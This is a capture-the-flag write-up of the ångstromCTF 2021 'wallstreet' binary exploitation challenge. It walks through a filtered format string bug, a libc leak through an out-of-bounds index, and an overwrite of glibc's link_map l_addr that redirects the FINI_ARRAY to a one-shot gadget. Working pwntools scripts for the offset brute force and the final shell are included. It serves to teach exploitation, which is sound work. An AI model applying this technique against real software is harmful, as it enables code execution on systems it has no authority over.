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ångstromCTF 2021 - wallstreet (pwn)

by Darin Mao on 4/15/2021

wallstreet was a binary exploitation challenge from ångstromCTF 2021. The intended solution involved a stack pivot, but in this writeup I will demonstrate a different technique applicable to many similar challenges.


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  • wallstreet


Apparently, Stonk Market really upset the author, because the flavortext is copied exactly from that challenge. As in Stonk Market, there is a buy_stonks function that contains a single format string vulnerability. However, there is a strange, rather contrived, filter on the format string:

do { if (299 < i) { puts("Buying stonks with token:"); printf(user_buf); putchar(10); return 0; } switch(user_buf[i]) { case 'A': case 'E': case 'F': case 'G': case 'X': case 'a': case 'c': case 'd': case 'e': case 'f': case 'g': case 'i': case 'o': case 'p': case 's': case 'u': case 'x': if ((0 < count) || (user_buf[i] != 'c')) { puts("Hey! Only one leak allowed!"); /* WARNING: Subroutine does not return */ exit(0); } count = count + 1; } i = i + 1; } while( true )

Essentially, we are not allowed to use any of these letters except for c, which we are allowed to use once. Note that n is not blocked, so we can potentially write to memory.

The only other difference between this challenge and Stonk Market is the ability to “see” a stonk right before the format string vulnerability.

puts("What stonk do you want to see?"); stonk_idx = 0; __isoc99_scanf("%d",&stonk_idx); puts(stonks[stonk_idx]);

We will use this to get a leak.

libc leak

Note that there is no bounds checking in the stonk viewing, so we can specify indices both before and after the intended array. Since this array is on the stack, we can likely find a pointer to a libc address that we can leak.

Unfortunately, many libc leaks involving the stack are highly reliant on environment, and we do not have access to the deploy used in this challenge. However, even though data down the stack is unknown, data up the stack should be fairly consistent, because the data there is mostly made up of locals from previous function calls. With some trial and error, we find that an index of -16 points to stdout@got, which was placed there by a call to puts. This index directly leaks the address of _IO_2_1_stdout_, giving us the address of libc.

Writing to struct link_map

glibc uses a large structure called link_map to describe each loaded object in memory. These structures form a linked list, and they are used by the dynamic linker. Since it is used during the program startup process, there is almost always a pointer to this structure (describing the main ELF) somewhere down the stack. This means that, with our format string vulnerability, we can overwrite the first few bytes of this structure, and that corresponds to the l_addr member.

When the program exits, _dl_fini is in charge of calling all the destructors for all loaded objects. The way it does this is by looking at the link_map structures (source).

/* First see whether an array is given. */ if (l->l_info[DT_FINI_ARRAY] != NULL) { ElfW(Addr) *array = (ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr); unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr))); while (i-- > 0) ((fini_t) array[i]) (); }

Basically, it finds the location of the FINI_ARRAY by finding the location of the DT_FINI_ARRAY dynamic section entry, then adds it to the value of l_addr. Therefore, we can offset the location of the FINI_ARRAY to point to our own input, then place a function pointer there to get rip control.

Conveniently, our input is in a global buffer, at a constant offset from FINI_ARRAY. The FINI_ARRAY is at 0x403e18, and user_buf starts at 0x4040e0, giving us a difference of 712. However, we’ll need some space to do the format string, so we’ll add 16 bytes to get 728.

The only tricky part is figuring out where the pointer to link_map is. On my local computer, it was at an offset of 98, but, as previously stated, going down the stack this far is highly reliant on environment. However, we can brute force this offset by writing a function pointer to main and trying different offsets around 98. Whichever offset successfully returns back to main on the remote server is the pointer to link_map. Code to do this is below.

# find offset of struct link_map * with context.quiet: for k in range(90, 110): try: print(k) r = conn() r.sendline('1') r.sendline('0') r.sendafter('token?\n', f'%728c%{k}$n'.ljust(16, ' ').encode() + p64(exe.sym['main'])) r.recvuntil('trading app') print('found', k) break except: pass finally: r.close()

This finds the offset on the remote server to be 100.

Angry Gadget

I thought this technique was pretty interesting, so I was quite disappointed when I found that no one_gadget for this specific libc produced a shell. However, in some cases, angry_gadget can find some more magic addresses with more complicated constraints. With some trial and error, I found this working gadget:

libc_base + 0xdf7a6 : <Bool reg_rbp_15728_64{UNINITIALIZED} == 0x47> <Bool 0xffffffffffffffb0 + reg_rbp_15728_64{UNINITIALIZED} == 0xfffffffffffffff7>

This gives us a shell.

r = conn() r.sendline('1') # libc leak r.sendlineafter('want to see?\n', '-16') libc.address = u64(r.recvline().strip().ljust(8, b'\x00')) - libc.sym['_IO_2_1_stdout_'] # format string r.sendafter('token?\n', f'%728c%{k}$n'.ljust(16, ' ').encode() + p64(libc.address + 0xdf7a6)) r.interactive()

